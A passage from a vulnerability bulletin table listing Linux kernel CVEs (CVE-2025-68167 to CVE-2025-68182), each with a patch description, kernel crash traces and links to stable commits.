https://lists.apache.org/thread/xr33kyxq3sl67lwb61ggvm1fzc8k7dvx |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpiolib: fix invalid pointer access in debugfs If the memory allocation in gpiolib_seq_start() fails, the s->private field remains uninitialized and is later dereferenced without checking in gpiolib_seq_stop(). Initialize s->private to NULL before calling kzalloc() and check it before dereferencing it. | 2025-12-16 | not yet calculated | CVE-2025-68167 | https://git.kernel.org/stable/c/70180a6031056096c93ed2f47c41803268bdd91c https://git.kernel.org/stable/c/3c91c8f424d3e44c8645ab765a38773e58afb07d https://git.kernel.org/stable/c/2f6115ad8864cf3f48598f26c74c7c8e5c391919 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jfs: fix uninitialized waitqueue in transaction manager The transaction manager initialization in txInit() was not properly initializing TxBlock[0].waitor waitqueue, causing a crash when txEnd(0) is called on read-only filesystems. When a filesystem is mounted read-only, txBegin() returns tid=0 to indicate no transaction. However, txEnd(0) still gets called and tries to access TxBlock[0].waitor via tid_to_tblock(0), but this waitqueue was never initialized because the initialization loop started at index 1 instead of 0. This causes a 'non-static key' lockdep warning and system crash: INFO: trying to register non-static key in txEnd Fix by ensuring all transaction blocks including TxBlock[0] have their waitqueues properly initialized during txInit(). | 2025-12-16 | not yet calculated | CVE-2025-68168 | https://git.kernel.org/stable/c/d6af7fce2e162ac68e85d3a11eb6ac8c35b24b64 https://git.kernel.org/stable/c/8cae9cf23e0bd424ac904e753639a587543ce03a https://git.kernel.org/stable/c/a2aa97cde9857f881920635a2e3d3b11769619c5 https://git.kernel.org/stable/c/d2dd7ca05a11685c314e62802a55e8d67a90e974 https://git.kernel.org/stable/c/2a9575a372182ca075070b3cd77490dcf0c951e7 https://git.kernel.org/stable/c/cbf2f527ae4ca7c7dabce42e85e8deb58588a37e https://git.kernel.org/stable/c/038861414ab383b41dd35abbf9ff0ef715592d53 https://git.kernel.org/stable/c/300b072df72694ea330c4c673c035253e07827b8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netpoll: Fix deadlock in memory allocation under spinlock Fix a AA deadlock in refill_skbs() where memory allocation while holding skb_pool->lock can trigger a recursive lock acquisition attempt. The deadlock scenario occurs when the system is under severe memory pressure: 1. refill_skbs() acquires skb_pool->lock (spinlock) 2. alloc_skb() is called while holding the lock 3. Memory allocator fails and calls slab_out_of_memory() 4. This triggers printk() for the OOM warning 5. The console output path calls netpoll_send_udp() 6. netpoll_send_udp() attempts to acquire the same skb_pool->lock 7. Deadlock: the lock is already held by the same CPU Call stack: refill_skbs() spin_lock_irqsave(&skb_pool->lock) <- lock acquired __alloc_skb() kmem_cache_alloc_node_noprof() slab_out_of_memory() printk() console_flush_all() netpoll_send_udp() skb_dequeue() spin_lock_irqsave(&skb_pool->lock) <- deadlock attempt This bug was exposed by commit 248f6571fd4c51 ("netpoll: Optimize skb refilling on critical path") which removed refill_skbs() from the critical path (where nested printk was being deferred), letting nested printk being called from inside refill_skbs() Refactor refill_skbs() to never allocate memory while holding the spinlock. Another possible solution to fix this problem is protecting the refill_skbs() from nested printks, basically calling printk_deferred_{enter,exit}() in refill_skbs(), then, any nested pr_warn() would be deferred. I prefer this approach, given I _think_ it might be a good idea to move the alloc_skb() from GFP_ATOMIC to GFP_KERNEL in the future, so, having the alloc_skb() outside of the lock will be necessary step. There is a possible TOCTOU issue when checking for the pool length, and queueing the new allocated skb, but, this is not an issue, given that an extra SKB in the pool is harmless and it will be eventually used. | 2025-12-16 | not yet calculated | CVE-2025-68169 | https://git.kernel.org/stable/c/06742a3ab884d7428c9050b205ffcf6a8a548397 https://git.kernel.org/stable/c/327c20c21d80e0d87834b392d83ae73c955ad8ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/radeon: Do not kfree() devres managed rdev Since the allocation of the drivers main structure was changed to devm_drm_dev_alloc() rdev is managed by devres and we shouldn't be calling kfree() on it. This fixes things exploding if the driver probe fails and devres cleans up the rdev after we already free'd it. (cherry picked from commit 16c0681617b8a045773d4d87b6140002fa75b03b) | 2025-12-16 | not yet calculated | CVE-2025-68170 | https://git.kernel.org/stable/c/f7482516002a11317912e29577bbf33cf59a0fb1 https://git.kernel.org/stable/c/2413bbd1d692aed245c2aa38a369a1fa7590db84 https://git.kernel.org/stable/c/3328443363a0895fd9c096edfe8ecd372ca9145e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Ensure XFD state on signal delivery Sean reported [1] the following splat when running KVM tests: WARNING: CPU: 232 PID: 15391 at xfd_validate_state+0x65/0x70 Call Trace: <TASK> fpu__clear_user_states+0x9c/0x100 arch_do_signal_or_restart+0x142/0x210 exit_to_user_mode_loop+0x55/0x100 do_syscall_64+0x205/0x2c0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Chao further identified [2] a reproducible scenario involving signal delivery: a non-AMX task is preempted by an AMX-enabled task which modifies the XFD MSR. When the non-AMX task resumes and reloads XSTATE with init values, a warning is triggered due to a mismatch between fpstate::xfd and the CPU's current XFD state. fpu__clear_user_states() does not currently re-synchronize the XFD state after such preemption. Invoke xfd_update_state() which detects and corrects the mismatch if there is a dynamic feature. This also benefits the sigreturn path, as fpu__restore_sig() may call fpu__clear_user_states() when the sigframe is inaccessible. [ dhansen: minor changelog munging ] | 2025-12-16 | not yet calculated | CVE-2025-68171 | https://git.kernel.org/stable/c/eefbfb722042fc9210d2e0ac2b063fd1abf51895 https://git.kernel.org/stable/c/1811c610653c0cd21cc9add14595b7cffaeca511 https://git.kernel.org/stable/c/5b2619b488f1d08b960c43c6468dd0759e8b3035 https://git.kernel.org/stable/c/3f735419c4b43cde42e6d408db39137b82474e31 https://git.kernel.org/stable/c/388eff894d6bc5f921e9bfff0e4b0ab2684a96e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: aspeed - fix double free caused by devm The clock obtained via devm_clk_get_enabled() is automatically managed by devres and will be disabled and freed on driver detach. Manually calling clk_disable_unprepare() in error path and remove function causes double free. Remove the manual clock cleanup in both aspeed_acry_probe()'s error path and aspeed_acry_remove(). | 2025-12-16 | not yet calculated | CVE-2025-68172 | https://git.kernel.org/stable/c/0dd6474ced33489076e6c0f3fe5077bf12e85b28 https://git.kernel.org/stable/c/29d0504077044a7e1ffbd09a6118018d5954a6e5 https://git.kernel.org/stable/c/e8407dfd267018f4647ffb061a9bd4a6d7ebacc6 https://git.kernel.org/stable/c/3c9bf72cc1ced1297b235f9422d62b613a3fdae9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix softlockup in ftrace_module_enable A soft lockup was observed when loading amdgpu module. If a module has a lot of tracable functions, multiple calls to kallsyms_lookup can spend too much time in RCU critical section and with disabled preemption, causing kernel panic. This is the same issue that was fixed in commit d0b24b4e91fc ("ftrace: Prevent RCU stall on PREEMPT_VOLUNTARY kernels") and commit 42ea22e754ba ("ftrace: Add cond_resched() to ftrace_graph_set_hash()"). Fix it the same way by adding cond_resched() in ftrace_module_enable. | 2025-12-16 | not yet calculated | CVE-2025-68173 | https://git.kernel.org/stable/c/a1dd0abd741a8111260676da729825d6c1461a71 https://git.kernel.org/stable/c/e81e6d6d99b16dae11adbeda5c996317942a940c https://git.kernel.org/stable/c/40c8ee40e48a2c82c762539952ed8fc0571db5bf https://git.kernel.org/stable/c/7e3c96010ade29bb340a5bdce8675f50c7f59001 https://git.kernel.org/stable/c/4099b98203d6b33d990586542fa5beee408032a3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amd/amdkfd: enhance kfd process check in switch partition current switch partition only check if kfd_processes_table is empty. kfd_prcesses_table entry is deleted in kfd_process_notifier_release, but kfd_process tear down is in kfd_process_wq_release. consider two processes: Process A (workqueue) -> kfd_process_wq_release -> Access kfd_node member Process B switch partition -> amdgpu_xcp_pre_partition_switch -> amdgpu_amdkfd_device_fini_sw -> kfd_node tear down. Process A and B may trigger a race as shown in dmesg log. This patch is to resolve the race by adding an atomic kfd_process counter kfd_processes_count, it increment as create kfd process, decrement as finish kfd_process_wq_release. v2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds and bug fix. (Philip Yang) [3966658.307702] divide error: 0000 [#1] SMP NOPTI [3966658.350818] i10nm_edac [3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted [3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu] [3966658.362839] nfit [3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu] [3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 <f7> be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00 [3966658.380967] x86_pkg_temp_thermal [3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246 [3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000 [3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00 [3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4 [3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000 [3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800 [3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000 [3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0 [3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [3966658.391536] PKRU: 55555554 [3966658.391536] Call Trace: [3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu] [3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu] [3966658.399754] intel_powerclamp [3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu] [3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu] [3966658.410516] coretemp [3966658.434016] process_one_work+0x1ad/0x380 [3966658.434021] worker_thread+0x49/0x310 [3966658.438963] kvm_intel [3966658.446041] ? process_one_work+0x380/0x380 [3966658.446045] kthread+0x118/0x140 [3966658.446047] ? __kthread_bind_mask+0x60/0x60 [3966658.446050] ret_from_fork+0x1f/0x30 [3966658.446053] Modules linked in: kpatch_20765354(OEK) [3966658.455310] kvm [3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK) [3966658.473462] idxd_mdev [3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68174 | https://git.kernel.org/stable/c/536d80f660ec12058e461f4db387ea42bee9250d https://git.kernel.org/stable/c/45da20e00d5da842e17dfc633072b127504f0d0e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: nxp: imx8-isi: Fix streaming cleanup on release The current implementation unconditionally calls mxc_isi_video_cleanup_streaming() in mxc_isi_video_release(). This can lead to situations where any release call (like from a simple "v4l2-ctl -l") may release a currently streaming queue when called on such a device. This is reproducible on an i.MX8MP board by streaming from an ISI capture device using gstreamer: gst-launch-1.0 -v v4l2src device=/dev/videoX ! \ video/x-raw,format=GRAY8,width=1280,height=800,framerate=1/120 ! \ fakesink While this stream is running, querying the caps of the same device provokes the error state: v4l2-ctl -l -d /dev/videoX This results in the following trace: [ 155.452152] ------------[ cut here ]------------ [ 155.452163] WARNING: CPU: 0 PID: 1708 at drivers/media/platform/nxp/imx8-isi/imx8-isi-pipe.c:713 mxc_isi_pipe_irq_handler+0x19c/0x1b0 [imx8_isi] [ 157.004248] Modules linked in: cfg80211 rpmsg_ctrl rpmsg_char rpmsg_tty virtio_rpmsg_bus rpmsg_ns rpmsg_core rfkill nft_ct nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables mcp251x6 [ 157.053499] CPU: 0 UID: 0 PID: 1708 Comm: python3 Not tainted 6.15.4-00114-g1f61ca5cad76 #1 PREEMPT [ 157.064369] Hardware name: imx8mp_board_01 (DT) [ 157.068205] pstate: 400000c5 (nZcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 157.075169] pc : mxc_isi_pipe_irq_handler+0x19c/0x1b0 [imx8_isi] [ 157.081195] lr : mxc_isi_pipe_irq_handler+0x38/0x1b0 [imx8_isi] [ 157.087126] sp : ffff800080003ee0 [ 157.090438] x29: ffff800080003ee0 x28: ffff0000c3688000 x27: 0000000000000000 [ 157.097580] x26: 0000000000000000 x25: ffff0000c1e7ac00 x24: ffff800081b5ad50 [ 157.104723] x23: 00000000000000d1 x22: 0000000000000000 x21: ffff0000c25e4000 [ 157.111866] x20: 0000000060000200 x19: ffff80007a0608d0 x18: 0000000000000000 [ 157.119008] x17: ffff80006a4e3000 x16: ffff800080000000 x15: 0000000000000000 [ 157.126146] x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000 [ 157.133287] x11: 0000000000000040 x10: ffff0000c01445f0 x9 : ffff80007a053a38 [ 157.140425] x8 : ffff0000c04004b8 x7 : 0000000000000000 x6 : 0000000000000000 [ 157.147567] x5 : ffff0000c0400490 x4 : ffff80006a4e3000 x3 : ffff0000c25e4000 [ 157.154706] x2 : 0000000000000000 x1 : ffff8000825c0014 x0 : 0000000060000200 [ 157.161850] Call trace: [ 157.164296] mxc_isi_pipe_irq_handler+0x19c/0x1b0 [imx8_isi] (P) [ 157.170319] __handle_irq_event_percpu+0x58/0x218 [ 157.175029] handle_irq_event+0x54/0xb8 [ 157.178867] handle_fasteoi_irq+0xac/0x248 [ 157.182968] handle_irq_desc+0x48/0x68 [ 157.186723] generic_handle_domain_irq+0x24/0x38 [ 157.191346] gic_handle_irq+0x54/0x120 [ 157.195098] call_on_irq_stack+0x24/0x30 [ 157.199027] do_interrupt_handler+0x88/0x98 [ 157.203212] el0_interrupt+0x44/0xc0 [ 157.206792] __el0_irq_handler_common+0x18/0x28 [ 157.211328] el0t_64_irq_handler+0x10/0x20 [ 157.215429] el0t_64_irq+0x198/0x1a0 [ 157.219009] ---[ end trace 0000000000000000 ]--- Address this issue by moving the streaming preparation and cleanup to the vb2 .prepare_streaming() and .unprepare_streaming() operations. This also simplifies the driver by allowing direct usage of the vb2_ioctl_streamon() and vb2_ioctl_streamoff() helpers, and removal of the manual cleanup from mxc_isi_video_release(). | 2025-12-16 | not yet calculated | CVE-2025-68175 | https://git.kernel.org/stable/c/029914306b93b37c6e7060793d2b6f76b935cfa6 https://git.kernel.org/stable/c/47773031a148ad7973b809cc7723cba77eda2b42 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: cadence: Check for the existence of cdns_pcie::ops before using it cdns_pcie::ops might not be populated by all the Cadence glue drivers. This is going to be true for the upcoming Sophgo platform which doesn't set the ops. Hence, add a check to prevent NULL pointer dereference. [mani: reworded subject and description] | 2025-12-16 | not yet calculated | CVE-2025-68176 | https://git.kernel.org/stable/c/d5dbe92ac8a4ca6226093241f95f9cb1b0d2e0e1 https://git.kernel.org/stable/c/eb3d29ca0820fa3d7cccad47d2da56c9ab5469ed https://git.kernel.org/stable/c/0d0bb756f002810d249caee51f3f1c309f3cdab5 https://git.kernel.org/stable/c/1810b2fd7375de88a74976dcd402b29088e479ed https://git.kernel.org/stable/c/953eb3796ef06b8ea3bf6bdde14156255bc75866 https://git.kernel.org/stable/c/363448d069e29685ca37a118065121e486387af3 https://git.kernel.org/stable/c/49a6c160ad4812476f8ae1a8f4ed6d15adfa6c09 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq/longhaul: handle NULL policy in longhaul_exit longhaul_exit() was calling cpufreq_cpu_get(0) without checking for a NULL policy pointer. On some systems, this could lead to a NULL dereference and a kernel warning or panic. This patch adds a check using unlikely() and returns early if the policy is NULL. Bugzilla: #219962 | 2025-12-16 | not yet calculated | CVE-2025-68177 | https://git.kernel.org/stable/c/b02352dd2e6cca98777714cc2a27553191df70db https://git.kernel.org/stable/c/956b56d17a89775e4957bbddefa45cd3c6c71000 https://git.kernel.org/stable/c/55cf586b9556863e3c2a45460aba71bcb2be5bcd https://git.kernel.org/stable/c/fd93e1d71b3b14443092919be12b1abf08de35eb https://git.kernel.org/stable/c/8d6791c480f22d6e9a566eaa77336d3d37c5c591 https://git.kernel.org/stable/c/64adabb6d9d51b7e7c02fe733346a2c4dd738488 https://git.kernel.org/stable/c/809cf2a7794ca4c14c304b349f4c3ae220701ce4 https://git.kernel.org/stable/c/592532a77b736b5153e0c2e4c74aa50af0a352ab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: fix possible deadlock while configuring policy Following deadlock can be triggered easily by lockdep: WARNING: possible circular locking dependency detected 6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted ------------------------------------------------------ check/1334 is trying to acquire lock: ff1100011d9d0678 (&q->sysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180 but task is already holding lock: ff1100011d9d00e0 (&q->q_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #2 (&q->q_usage_counter(queue)#3){++++}-{0:0}: blk_queue_enter+0x40b/0x470 blkg_conf_prep+0x7b/0x3c0 tg_set_limit+0x10a/0x3e0 cgroup_file_write+0xc6/0x420 kernfs_fop_write_iter+0x189/0x280 vfs_write+0x256/0x490 ksys_write+0x83/0x190 __x64_sys_write+0x21/0x30 x64_sys_call+0x4608/0x4630 do_syscall_64+0xdb/0x6b0 entry_SYSCALL_64_after_hwframe+0x76/0x7e -> #1 (&q->rq_qos_mutex){+.+.}-{4:4}: __mutex_lock+0xd8/0xf50 mutex_lock_nested+0x2b/0x40 wbt_init+0x17e/0x280 wbt_enable_default+0xe9/0x140 blk_register_queue+0x1da/0x2e0 __add_disk+0x38c/0x5d0 add_disk_fwnode+0x89/0x250 device_add_disk+0x18/0x30 virtblk_probe+0x13a3/0x1800 virtio_dev_probe+0x389/0x610 really_probe+0x136/0x620 __driver_probe_device+0xb3/0x230 driver_probe_device+0x2f/0xe0 __driver_attach+0x158/0x250 bus_for_each_dev+0xa9/0x130 driver_attach+0x26/0x40 bus_add_driver+0x178/0x3d0 driver_register+0x7d/0x1c0 __register_virtio_driver+0x2c/0x60 virtio_blk_init+0x6f/0xe0 do_one_initcall+0x94/0x540 kernel_init_freeable+0x56a/0x7b0 kernel_init+0x2b/0x270 ret_from_fork+0x268/0x4c0 ret_from_fork_asm+0x1a/0x30 -> #0 (&q->sysfs_lock){+.+.}-{4:4}: __lock_acquire+0x1835/0x2940 lock_acquire+0xf9/0x450 __mutex_lock+0xd8/0xf50 mutex_lock_nested+0x2b/0x40 blk_unregister_queue+0x53/0x180 __del_gendisk+0x226/0x690 del_gendisk+0xba/0x110 sd_remove+0x49/0xb0 [sd_mod] device_remove+0x87/0xb0 device_release_driver_internal+0x11e/0x230 device_release_driver+0x1a/0x30 bus_remove_device+0x14d/0x220 device_del+0x1e1/0x5a0 __scsi_remove_device+0x1ff/0x2f0 scsi_remove_device+0x37/0x60 sdev_store_delete+0x77/0x100 dev_attr_store+0x1f/0x40 sysfs_kf_write+0x65/0x90 kernfs_fop_write_iter+0x189/0x280 vfs_write+0x256/0x490 ksys_write+0x83/0x190 __x64_sys_write+0x21/0x30 x64_sys_call+0x4608/0x4630 do_syscall_64+0xdb/0x6b0 entry_SYSCALL_64_after_hwframe+0x76/0x7e other info that might help us debug this: Chain exists of: &q->sysfs_lock --> &q->rq_qos_mutex --> &q->q_usage_counter(queue)#3 Possible unsafe locking scenario: CPU0 CPU1 ---- ---- lock(&q->q_usage_counter(queue)#3); lock(&q->rq_qos_mutex); lock(&q->q_usage_counter(queue)#3); lock(&q->sysfs_lock); Root cause is that queue_usage_counter is grabbed with rq_qos_mutex held in blkg_conf_prep(), while queue should be freezed before rq_qos_mutex from other context. The blk_queue_enter() from blkg_conf_prep() is used to protect against policy deactivation, which is already protected with blkcg_mutex, hence convert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile, consider that blkcg_mutex is held after queue is freezed from policy deactivation, also convert blkg_alloc() to use GFP_NOIO. | 2025-12-16 | not yet calculated | CVE-2025-68178 | https://git.kernel.org/stable/c/e1729523759cda2c0afb76b1c88e0d2f2ef5b7cb https://git.kernel.org/stable/c/56ac639d6fa6fbb99caee74ee1c7276fc9bb47ed https://git.kernel.org/stable/c/0585b24d71197dd9ee8cf79c168a31628c631960 https://git.kernel.org/stable/c/5d726c4dbeeddef612e6bed27edd29733f4d13af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390: Disable ARCH_WANT_OPTIMIZE_HUGETLB_VMEMMAP As reported by Luiz Capitulino enabling HVO on s390 leads to reproducible crashes. The problem is that kernel page tables are modified without flushing corresponding TLB entries. Even if it looks like the empty flush_tlb_all() implementation on s390 is the problem, it is actually a different problem: on s390 it is not allowed to replace an active/valid page table entry with another valid page table entry without the detour over an invalid entry. A direct replacement may lead to random crashes and/or data corruption. In order to invalidate an entry special instructions have to be used (e.g. ipte or idte). Alternatively there are also special instructions available which allow to replace a valid entry with a different valid entry (e.g. crdte or cspg). Given that the HVO code currently does not provide the hooks to allow for an implementation which is compliant with the s390 architecture requirements, disable ARCH_WANT_OPTIMIZE_HUGETLB_VMEMMAP again, which is basically a revert of the original patch which enabled it. | 2025-12-16 | not yet calculated | CVE-2025-68179 | https://git.kernel.org/stable/c/7088465f10816d9425b95740b37c95f082041d76 https://git.kernel.org/stable/c/5e23918e4352288323d13fb511116cdea0234b71 https://git.kernel.org/stable/c/d4a8238e5729505b7394ccb007e5dc3e557aa66b https://git.kernel.org/stable/c/64e2f60f355e556337fcffe80b9bcff1b22c9c42 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix NULL deref in debugfs odm_combine_segments When a connector is connected but inactive (e.g., disabled by desktop environments), pipe_ctx->stream_res.tg will be destroyed. Then, reading odm_combine_segments causes kernel NULL pointer dereference. BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 16 UID: 0 PID: 26474 Comm: cat Not tainted 6.17.0+ #2 PREEMPT(lazy) e6a17af9ee6db7c63e9d90dbe5b28ccab67520c6 Hardware name: LENOVO 21Q4/LNVNB161216, BIOS PXCN25WW 03/27/2025 RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu] Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 <48> 8b 07 48 8b 80 08 02 00> RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286 RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8 RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000 RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0 R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08 R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001 FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0 PKRU: 55555554 Call Trace: <TASK> seq_read_iter+0x125/0x490 ? __alloc_frozen_pages_noprof+0x18f/0x350 seq_read+0x12c/0x170 full_proxy_read+0x51/0x80 vfs_read+0xbc/0x390 ? __handle_mm_fault+0xa46/0xef0 ? do_syscall_64+0x71/0x900 ksys_read+0x73/0xf0 do_syscall_64+0x71/0x900 ? count_memcg_events+0xc2/0x190 ? handle_mm_fault+0x1d7/0x2d0 ? do_user_addr_fault+0x21a/0x690 ? exc_page_fault+0x7e/0x1a0 entry_SYSCALL_64_after_hwframe+0x6c/0x74 RIP: 0033:0x7f44d4031687 Code: 48 89 fa 4c 89 df e8 58 b3 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 <5b> c3 0f 1f 80 00 00 00 00> RSP: 002b:00007ffdb4b5f0b0 EFLAGS: 00000202 ORIG_RAX: 0000000000000000 RAX: ffffffffffffffda RBX: 00007f44d3f9f740 RCX: 00007f44d4031687 RDX: 0000000000040000 RSI: 00007f44d3f5e000 RDI: 0000000000000003 RBP: 0000000000040000 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000202 R12: 00007f44d3f5e000 R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000040000 </TASK> Modules linked in: tls tcp_diag inet_diag xt_mark ccm snd_hrtimer snd_seq_dummy snd_seq_midi snd_seq_oss snd_seq_midi_event snd_rawmidi snd_seq snd_seq_device x> snd_hda_codec_atihdmi snd_hda_codec_realtek_lib lenovo_wmi_helpers think_lmi snd_hda_codec_generic snd_hda_codec_hdmi snd_soc_core kvm snd_compress uvcvideo sn> platform_profile joydev amd_pmc mousedev mac_hid sch_fq_codel uinput i2c_dev parport_pc ppdev lp parport nvme_fabrics loop nfnetlink ip_tables x_tables dm_cryp> CR2: 0000000000000000 ---[ end trace 0000000000000000 ]--- RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu] Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 <48> 8b 07 48 8b 80 08 02 00> RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286 RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8 RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000 RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0 R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08 R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001 FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0 PKRU: 55555554 Fix this by checking pipe_ctx-> ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68180 | https://git.kernel.org/stable/c/d990c7f180aa7c6ffd2c1b3c77160e50672039ce https://git.kernel.org/stable/c/c05fe5d47baac212a3a74b279239f495be101629 https://git.kernel.org/stable/c/6dd97ceb645c08aca9fc871a3006e47fe699f0ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/radeon: Remove calls to drm_put_dev() Since the allocation of the drivers main structure was changed to devm_drm_dev_alloc() drm_put_dev()'ing to trigger it to be free'd should be done by devres. However, drm_put_dev() is still in the probe error and device remove paths. When the driver fails to probe warnings like the following are shown because devres is trying to drm_put_dev() after the driver already did it. [ 5.642230] radeon 0000:01:05.0: probe with driver radeon failed with error -22 [ 5.649605] ------------[ cut here ]------------ [ 5.649607] refcount_t: underflow; use-after-free. [ 5.649620] WARNING: CPU: 0 PID: 357 at lib/refcount.c:28 refcount_warn_saturate+0xbe/0x110 (cherry picked from commit 3eb8c0b4c091da0a623ade0d3ee7aa4a93df1ea4) | 2025-12-16 | not yet calculated | CVE-2025-68181 | https://git.kernel.org/stable/c/2fa41445d8c98f2a65503c373796466496edc0e7 https://git.kernel.org/stable/c/ec18f6b2c743cc471b2539ddb5caed20a012e640 https://git.kernel.org/stable/c/745bae76acdd71709773c129a69deca01036250b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix potential use after free in iwl_mld_remove_link() This code frees "link" by calling kfree_rcu(link, rcu_head) and then it dereferences "link" to get the "link->fw_id". Save the "link->fw_id" first to avoid a potential use after free. | 2025-12-16 | not yet calculated | CVE-2025-68182 | https://git.kernel.org/stable/c/5b4a239c9f94e1606435f1842fc6fd426d607dbb https://git.kernel.org/stable/c/77e67d5daaf155f7d0f99f4e797c4842169ec19e |
